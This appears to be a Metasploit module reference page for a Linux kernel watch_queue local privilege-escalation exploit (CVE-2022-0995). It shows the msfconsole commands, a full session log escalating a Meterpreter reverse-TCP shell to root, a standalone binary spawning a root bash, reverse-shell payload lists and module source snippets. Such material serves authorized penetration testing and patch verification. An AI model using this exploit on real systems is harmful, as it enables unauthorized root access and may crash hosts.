Watch Queue Out of Bounds Write - Metasploit
This page contains detailed information about how to use the exploit/linux/local/cve_2022_0995_watch_queue metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Watch Queue Out of Bounds Write
Module: exploit/linux/local/cve_2022_0995_watch_queue
Source code: modules/exploits/linux/local/cve_2022_0995_watch_queue.rb
Disclosure date: 2022-03-14
Last modification time: 2022-04-21 07:44:40 +0000
Supported architecture(s): x64
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2022-0995
This module exploits a vulnerability in the Linux Kernel's watch_queue event notification system. It relies on a heap out-of-bounds write in kernel memory. The exploit may fail on the first attempt so multiple attempts may be needed. Note that the exploit can potentially cause a denial of service if multiple failed attemps occur, however this is unlikely.
Module Ranking and Traits
Module Ranking:
- great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. More information about ranking can be found here.
Reliability:
- unreliable-session: The module isn't expected to get a shell reliably (such as only once).
Stability:
- crash-os-down: Module may crash the OS, and the OS remains down.
Side Effects:
- artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt.
Also, to check the session ID, use the sessions
command.
msf > use exploit/linux/local/cve_2022_0995_watch_queue
msf exploit(cve_2022_0995_watch_queue) > show targets
... a list of targets ...
msf exploit(cve_2022_0995_watch_queue) > set TARGET target-id
msf exploit(cve_2022_0995_watch_queue) > show options
... show and set options ...
msf exploit(cve_2022_0995_watch_queue) > set SESSION session-id
msf exploit(cve_2022_0995_watch_queue) > exploit
Required Options
- SESSION: The session to run this module on
Knowledge Base
Vulnerable Application
This module exploits a vulnerability in the Linux Kernel's watch_queue event notification system. It relies on a heap out-of-bounds write in kernel memory. The exploit may fail on the first attempt so multiple attempts may be needed. Note that the exploit can potentially cause a denial of service if multiple failed attemps occur, however this is unlikely.
Install
The vulnerability exists in linux kernel versions up to 5.17 rc8; this module only contains offsets for Ubuntu 21.10 kernel 5.13.0-37. More offsets may be added later.
Install Ubuntu 21.10
apt-get install linux-image-5.13.0-37-generic
Hold shift when you reboot and select the proper kernel version
Verification Steps
- Make an Ubuntu target.
- Create a Meterpreter or shell payload and upload it to the Ubuntu target.
- Set up a handler for the payload.
- Launch the payload as a regular user on the Ubuntu target.
- Do:
use exploit/linux/local/cve_2022_0995_watch_queue
- Do:
set payload <payload>
- Do:
set lhost <ip>
- Do:
set [r|l]port <port>
- Do:
run
- You should get a new shell as the
root
user.
Options
COMPILE
[Auto|True|False] This selects the binary to use. True
will cause the module to upload the source
code and perform compilation on target, False
will cause the module to upload a precompiled binary.
Auto
will cause the module to try compiling the exploit on the target but will fall back to the
precompiled option if a compiler cannot be found.
DEBUG_SOURCE
[True|False] This selects whether or not the module should use source code with debug prints when
uploading and compiling on disk. If set to True
the module will use source code with prints
that assist with troubleshooting failed exploits. If set to False
the module will use source code
without these debug statements/prints. Note if it is not possible to compile the code on the target,
the precompiled binary will be used which has no debug print statements.
WritableDir
This indicates the location where you would like the payload and exploit binary stored, as well
as serving as a location to store the various files and directories created by the exploit itself.
The default value is /tmp
Scenarios
Ubuntu 21.10 x64 With Linux 5.13.0.37-Generic
msf6 payload(linux/x64/meterpreter/reverse_tcp) >
[*] Started reverse TCP handler on 10.5.135.101:4567
[*] Sending stage (3020772 bytes) to 10.5.134.157
[*] Meterpreter session 1 opened (10.5.135.101:4567 -> 10.5.134.157:34614 ) at 2022-04-12 21:04:39 -0500
msf6 payload(linux/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : 10.5.134.157
OS : Ubuntu 21.10 (Linux 5.13.0-37-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(linux/x64/meterpreter/reverse_tcp) > use exploit/linux/local/cve_2022_0995_watch_queue
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2022_0995_watch_queue) > show options
Module options (exploit/linux/local/cve_2022_0995_watch_queue):
Name Current Setting Required Description
---- --------------- -------- -----------
COMPILE Auto yes Compile on target (Accepted: Auto, True, False)
DEBUG_SOURCE false no Use source code with debug prints to help troubleshoot
SESSION yes The session to run this module on
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.5.135.101 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Ubuntu Linux 5.13.0-37
msf6 exploit(linux/local/cve_2022_0995_watch_queue) > set session 1
session => 1
msf6 exploit(linux/local/cve_2022_0995_watch_queue) > set verbose true
verbose => true
msf6 exploit(linux/local/cve_2022_0995_watch_queue) > run
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_railgun_api
[*] Started reverse TCP handler on 10.5.135.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version array: ["5.13.0", "37", "generic"]
[*] major_version: 5.13.0
[*] minor_version: 37
[+] The target appears to be vulnerable.
[*] Version array: ["5.13.0", "37", "generic"]
[*] major_version: 5.13.0
[*] minor_version: 37
[*] Creating directory /tmp/.nILfP259
[*] /tmp/.nILfP259 created
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Writing '/tmp/.nILfP259/.7BZngDv' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.nILfP259/.gJKqSJssjC /tmp/.nILfP259/.7BZngDv
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.5.134.157
[+] Deleted /tmp/.nILfP259/.gJKqSJssjC
[+] Deleted /tmp/.nILfP259
[*] Meterpreter session 2 opened (10.5.135.101:4444 -> 10.5.134.157:50382 ) at 2022-04-12 21:05:25 -0500
[*]
meterpreter > sysinfo
Computer : 10.5.134.157
OS : Ubuntu 21.10 (Linux 5.13.0-37-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root
meterpreter >
Notes
Included Binaries
The binary used by this exploit data/exploits/CVE-2022-0995/cve_2021_3493.x64.elf
can be used separately from
Metasploit. The binary takes a single argument which is the payload or executable you wish to launch as root
.
The following snippet shows an example of how one might run this binary with the /bin/bash
executable to get
a new Bash shell as the root
user.
msfuser@msfuser-virtual-machine:~$ id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
msfuser@msfuser-virtual-machine:~$ ./cve_2021_3493.x64.elf /bin/bash
root@msfuser-virtual-machine:~$
Go back to menu.
Msfconsole Usage
Here is how the linux/local/cve_2022_0995_watch_queue exploit module looks in the msfconsole:
msf6 > use exploit/linux/local/cve_2022_0995_watch_queue
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2022_0995_watch_queue) > show info
Name: Watch Queue Out of Bounds Write
Module: exploit/linux/local/cve_2022_0995_watch_queue
Platform: Linux
Arch: x64
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2022-03-14
Provided by:
Jann Horn
bonfee
bwatters-r7
Module side effects:
artifacts-on-disk
Module stability:
crash-os-down
Module reliability:
unreliable-session
Available targets:
Id Name
-- ----
0 Ubuntu Linux 5.13.0-37
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
COMPILE Auto yes Compile on target (Accepted: Auto, True, False)
DEBUG_SOURCE false no Use source code with debug prints to help troubleshoot
SESSION yes The session to run this module on
Payload information:
Description:
This module exploits a vulnerability in the Linux Kernel's
watch_queue event notification system. It relies on a heap
out-of-bounds write in kernel memory. The exploit may fail on the
first attempt so multiple attempts may be needed. Note that the
exploit can potentially cause a denial of service if multiple failed
attemps occur, however this is unlikely.
References:
https://nvd.nist.gov/vuln/detail/CVE-2022-0995
https://github.com/Bonfee/CVE-2022-0995
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=93ce93587d36493f2f86921fa79921b3cba63fbb
https://nvd.nist.gov/vuln/detail/CVE-2022-0995
https://packetstormsecurity.com/files/166770
Module Options
This is a complete list of options available in the linux/local/cve_2022_0995_watch_queue exploit:
msf6 exploit(linux/local/cve_2022_0995_watch_queue) > show options
Module options (exploit/linux/local/cve_2022_0995_watch_queue):
Name Current Setting Required Description
---- --------------- -------- -----------
COMPILE Auto yes Compile on target (Accepted: Auto, True, False)
DEBUG_SOURCE false no Use source code with debug prints to help troubleshoot
SESSION yes The session to run this module on
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.0.126 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Ubuntu Linux 5.13.0-37
Advanced Options
Here is a complete list of advanced options supported by the linux/local/cve_2022_0995_watch_queue exploit:
msf6 exploit(linux/local/cve_2022_0995_watch_queue) > show advanced
Module advanced options (exploit/linux/local/cve_2022_0995_watch_queue):
Name Current Setting Required Description
---- --------------- -------- -----------
AllowNoCleanup false no Allow exploitation without the possibility of cleaning up files
AutoCheck true no Run check before exploit
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
ForceExploit false no Override check result
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
WritableDir /tmp yes A directory where we can write files
Payload advanced options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLevel 0 yes Set debug level for meterpreter 0-3 (Default output is strerr)
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://github.com/rapid7/metasploit-fram
ework/wiki/Meterpreter-Debugging-Meterpreter-Sessions
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root)
PrependFork false no Prepend a stub that starts the payload in its own process via fork
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
RemoteMeterpreterDebugFile no Redirect Debug Info to a Log File
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but
directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the linux/local/cve_2022_0995_watch_queue module can exploit:
msf6 exploit(linux/local/cve_2022_0995_watch_queue) > show targets
Exploit targets:
Id Name
-- ----
0 Ubuntu Linux 5.13.0-37
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the linux/local/cve_2022_0995_watch_queue exploit:
msf6 exploit(linux/local/cve_2022_0995_watch_queue) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/generic/ssh/interact normal No Interact with Established SSH Connection
4 payload/linux/x64/exec normal No Linux Execute Command
5 payload/linux/x64/meterpreter/bind_tcp normal No Linux Mettle x64, Bind TCP Stager
6 payload/linux/x64/meterpreter/reverse_tcp normal No Linux Mettle x64, Reverse TCP Stager
7 payload/linux/x64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
8 payload/linux/x64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
9 payload/linux/x64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
10 payload/linux/x64/pingback_bind_tcp normal No Linux x64 Pingback, Bind TCP Inline
11 payload/linux/x64/pingback_reverse_tcp normal No Linux x64 Pingback, Reverse TCP Inline
12 payload/linux/x64/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager
13 payload/linux/x64/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
14 payload/linux/x64/shell_bind_ipv6_tcp normal No Linux x64 Command Shell, Bind TCP Inline (IPv6)
15 payload/linux/x64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
16 payload/linux/x64/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline
17 payload/linux/x64/shell_reverse_ipv6_tcp normal No Linux x64 Command Shell, Reverse TCP Inline (IPv6)
18 payload/linux/x64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
Evasion Options
Here is the full list of possible evasion options supported by the linux/local/cve_2022_0995_watch_queue exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(linux/local/cve_2022_0995_watch_queue) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Failed to parse the kernel version data: <KERNEL_DATA>
- Session already has root privileges. Set ForceExploit to override.
- DEBUG_PRINT is only supported when COMPILE is set to True
- Unsupported Distro: '<VERSION>'
- Unsupported architecture: '<ARCH>'
- Failed to obtain kernel version
- No offsets for '<KERNEL_RELEASE>'
- Failed to obtain kernel version
- The target kernel version <MAJOR_VERSION> is later than the last known vulnerable version aka <VULNERABLE_VERSION>
- <BASE_DIR> is not writable
- Exploit dir already exists
- Caught timeout. Exploit may be taking longer or it may have failed.
- Exploit failed: <E>
- Ensure deletion of <EXPLOIT_PATH> and <PAYLOAD_PATH>
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Failed to parse the kernel version data: <KERNEL_DATA>
Here is a relevant code snippet related to the "Failed to parse the kernel version data: <KERNEL_DATA>" error message:
66:
67: def pull_version
68: kernel_data = kernel_release
69: version_array = kernel_data.split('-')
70: if version_array.length < 3
71: print_error("Failed to parse the kernel version data: #{kernel_data}")
72: return nil
73: end
74: vprint_status("Version array: #{version_array}")
75: major_version = Rex::Version.new(version_array[0])
76: vprint_status("major_version: #{major_version}")
Session already has root privileges. Set ForceExploit to override.
Here is a relevant code snippet related to the "Session already has root privileges. Set ForceExploit to override." error message:
82:
83: def module_check
84: # Vulnerable versions are under 5.17:rc8
85: # This module only has offsets for Ubuntu 5.13.0-37
86: if is_root? && !datastore['ForceExploit']
87: fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override.')
88: end
89: if datastore['DEBUG_SOURCE'] && datastore['COMPILE'] != 'True'
90: fail_with(Failure::BadConfig, 'DEBUG_PRINT is only supported when COMPILE is set to True')
91: end
92: unless kernel_version =~ /[uU]buntu/
DEBUG_PRINT is only supported when COMPILE is set to True
Here is a relevant code snippet related to the "DEBUG_PRINT is only supported when COMPILE is set to True" error message:
85: # This module only has offsets for Ubuntu 5.13.0-37
86: if is_root? && !datastore['ForceExploit']
87: fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override.')
88: end
89: if datastore['DEBUG_SOURCE'] && datastore['COMPILE'] != 'True'
90: fail_with(Failure::BadConfig, 'DEBUG_PRINT is only supported when COMPILE is set to True')
91: end
92: unless kernel_version =~ /[uU]buntu/
93: fail_with(Failure::NoTarget, "Unsupported Distro: '#{version}'")
94: end
95: arch = kernel_hardware
Unsupported Distro: '<VERSION>'
Here is a relevant code snippet related to the "Unsupported Distro: '<VERSION>'" error message:
88: end
89: if datastore['DEBUG_SOURCE'] && datastore['COMPILE'] != 'True'
90: fail_with(Failure::BadConfig, 'DEBUG_PRINT is only supported when COMPILE is set to True')
91: end
92: unless kernel_version =~ /[uU]buntu/
93: fail_with(Failure::NoTarget, "Unsupported Distro: '#{version}'")
94: end
95: arch = kernel_hardware
96: unless arch.include?('x86_64')
97: fail_with(Failure::NoTarget, "Unsupported architecture: '#{arch}'")
98: end
Unsupported architecture: '<ARCH>'
Here is a relevant code snippet related to the "Unsupported architecture: '<ARCH>'" error message:
92: unless kernel_version =~ /[uU]buntu/
93: fail_with(Failure::NoTarget, "Unsupported Distro: '#{version}'")
94: end
95: arch = kernel_hardware
96: unless arch.include?('x86_64')
97: fail_with(Failure::NoTarget, "Unsupported architecture: '#{arch}'")
98: end
99: version_info = pull_version
100: if version_info.nil?
101: fail_with(Failure::NoTarget, 'Failed to obtain kernel version')
102: end
Failed to obtain kernel version
Here is a relevant code snippet related to the "Failed to obtain kernel version" error message:
96: unless arch.include?('x86_64')
97: fail_with(Failure::NoTarget, "Unsupported architecture: '#{arch}'")
98: end
99: version_info = pull_version
100: if version_info.nil?
101: fail_with(Failure::NoTarget, 'Failed to obtain kernel version')
102: end
103: major_version, minor_version, kernel_type = version_info
104: vulnerable_version = Rex::Version.new('5.13.0')
105: unless major_version == vulnerable_version && minor_version == '37' && kernel_type.include?('generic')
106: fail_with(Failure::NoTarget, "No offsets for '#{kernel_release}'")
No offsets for '<KERNEL_RELEASE>'
Here is a relevant code snippet related to the "No offsets for '<KERNEL_RELEASE>'" error message:
101: fail_with(Failure::NoTarget, 'Failed to obtain kernel version')
102: end
103: major_version, minor_version, kernel_type = version_info
104: vulnerable_version = Rex::Version.new('5.13.0')
105: unless major_version == vulnerable_version && minor_version == '37' && kernel_type.include?('generic')
106: fail_with(Failure::NoTarget, "No offsets for '#{kernel_release}'")
107: end
108: end
109:
110: def check
111: # Vulnerable versions are under 5.17:rc8
Failed to obtain kernel version
Here is a relevant code snippet related to the "Failed to obtain kernel version" error message:
111: # Vulnerable versions are under 5.17:rc8
112: # This module only has offsets for 5.13.0-37
113: vulnerable_version = Rex::Version.new('5.17.0')
114: version_info = pull_version
115: if version_info.nil?
116: return CheckCode::Unknown('Failed to obtain kernel version')
117: end
118:
119: major_version = version_info[0]
120: if major_version <= vulnerable_version
121: return CheckCode::Appears
The target kernel version <MAJOR_VERSION> is later than the last known vulnerable version aka <VULNERABLE_VERSION>
Here is a relevant code snippet related to the "The target kernel version <MAJOR_VERSION> is later than the last known vulnerable version aka <VULNERABLE_VERSION>" error message:
118:
119: major_version = version_info[0]
120: if major_version <= vulnerable_version
121: return CheckCode::Appears
122: else
123: return CheckCode::Safe("The target kernel version #{major_version} is later than the last known vulnerable version aka #{vulnerable_version}")
124: end
125: end
126:
127: def exploit
128: module_check
<BASE_DIR> is not writable
Here is a relevant code snippet related to the "<BASE_DIR> is not writable" error message:
126:
127: def exploit
128: module_check
129: base_dir = datastore['WritableDir'].to_s
130: unless writable?(base_dir)
131: fail_with(Failure::BadConfig, "#{base_dir} is not writable")
132: end
133:
134: executable_name = ".#{rand_text_alphanumeric(5..10)}"
135: exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
136: exploit_path = "#{exploit_dir}/#{executable_name}"
Exploit dir already exists
Here is a relevant code snippet related to the "Exploit dir already exists" error message:
133:
134: executable_name = ".#{rand_text_alphanumeric(5..10)}"
135: exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
136: exploit_path = "#{exploit_dir}/#{executable_name}"
137: if file_exist?(exploit_dir)
138: fail_with(Failure::BadConfig, 'Exploit dir already exists')
139: end
140: mkdir(exploit_dir)
141: register_dir_for_cleanup(exploit_dir)
142:
143: # Upload exploit
Caught timeout. Exploit may be taking longer or it may have failed.
Here is a relevant code snippet related to the "Caught timeout. Exploit may be taking longer or it may have failed." error message:
168: vprint_status("Running: #{cmd_string}")
169: begin
170: output = cmd_exec(cmd_string)
171: vprint_status(output)
172: rescue Error => e
173: elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)
174: print_error("Exploit failed: #{e}")
175: print_error("Ensure deletion of #{exploit_path} and #{payload_path}")
176: end
177: end
178: end
Exploit failed: <E>
Here is a relevant code snippet related to the "Exploit failed: <E>" error message:
168: vprint_status("Running: #{cmd_string}")
169: begin
170: output = cmd_exec(cmd_string)
171: vprint_status(output)
172: rescue Error => e
173: elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)
174: print_error("Exploit failed: #{e}")
175: print_error("Ensure deletion of #{exploit_path} and #{payload_path}")
176: end
177: end
178: end
Ensure deletion of <EXPLOIT_PATH> and <PAYLOAD_PATH>
Here is a relevant code snippet related to the "Ensure deletion of <EXPLOIT_PATH> and <PAYLOAD_PATH>" error message:
168: vprint_status("Running: #{cmd_string}")
169: begin
170: output = cmd_exec(cmd_string)
171: vprint_status(output)
172: rescue Error => e
173: elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)
174: print_error("Exploit failed: #{e}")
175: print_error("Ensure deletion of #{exploit_path} and #{payload_path}")
176: end
177: end
178: end
Go back to menu.
Related Pull Requests
- #16530 Merged Pull Request: Update PiHole module to not wait for sudo input
- #16514 Merged Pull Request: Add Zoneminder lang exec module
- #16445 Merged Pull Request: Add support for Meterpreter logging to file
- #16525 Merged Pull Request: Fix VMware Workspace ONE Access CVE-2022-22954
- #16462 Merged Pull Request: gdb_server_exec: Cleanup and add support for armle/aarch64 architectures
- #16512 Merged Pull Request: Add VMware Workspace ONE Access CVE-2022-22954
References
- CVE-2022-0995
- https://github.com/Bonfee/CVE-2022-0995
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=93ce93587d36493f2f86921fa79921b3cba63fbb
- https://nvd.nist.gov/vuln/detail/CVE-2022-0995
- PACKETSTORM-166770
See Also
Check also the following modules related to this module:
- exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe
- exploit/linux/local/cve_2021_3493_overlayfs
- exploit/linux/local/cve_2021_38648_omigod
- exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
- exploit/linux/local/cve_2022_0847_dirtypipe
- exploit/linux/http/cve_2019_1663_cisco_rmi_rce
- exploit/linux/misc/cve_2020_13160_anydesk
- exploit/linux/misc/cve_2021_38647_omigod
- exploit/multi/http/cve_2021_35464_forgerock_openam
- exploit/multi/sap/cve_2020_6207_solman_rs
- exploit/windows/dcerpc/cve_2021_1675_printnightmare
- exploit/windows/fileformat/cve_2017_8464_lnk_rce
- exploit/windows/local/cve_2017_8464_lnk_lpe
- exploit/windows/local/cve_2018_8453_win32k_priv_esc
- exploit/windows/local/cve_2019_1458_wizardopium
- exploit/windows/local/cve_2020_0668_service_tracing
- exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move
- exploit/windows/local/cve_2020_0796_smbghost
- exploit/windows/local/cve_2020_1048_printerdemon
- exploit/windows/local/cve_2020_1054_drawiconex_lpe
- exploit/windows/local/cve_2020_1313_system_orchestrator
- exploit/windows/local/cve_2020_1337_printerdemon
- exploit/windows/local/cve_2020_17136
- exploit/windows/local/cve_2021_1732_win32k
- exploit/windows/local/cve_2021_21551_dbutil_memmove
- exploit/windows/local/cve_2021_40449
- exploit/windows/local/cve_2022_21882_win32k
- exploit/windows/local/cve_2022_21999_spoolfool_privesc
- exploit/windows/local/cve_2022_26904_superprofile
- exploit/windows/misc/cve_2022_28381_allmediaserver_bof
- exploit/windows/rdp/cve_2019_0708_bluekeep_rce
- exploit/windows/smb/cve_2020_0796_smbghost
- exploit/android/local/futex_requeue
Authors
- Jann Horn
- bonfee
- bwatters-r7
Version
This page has been produced using Metasploit Framework version 6.2.1-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.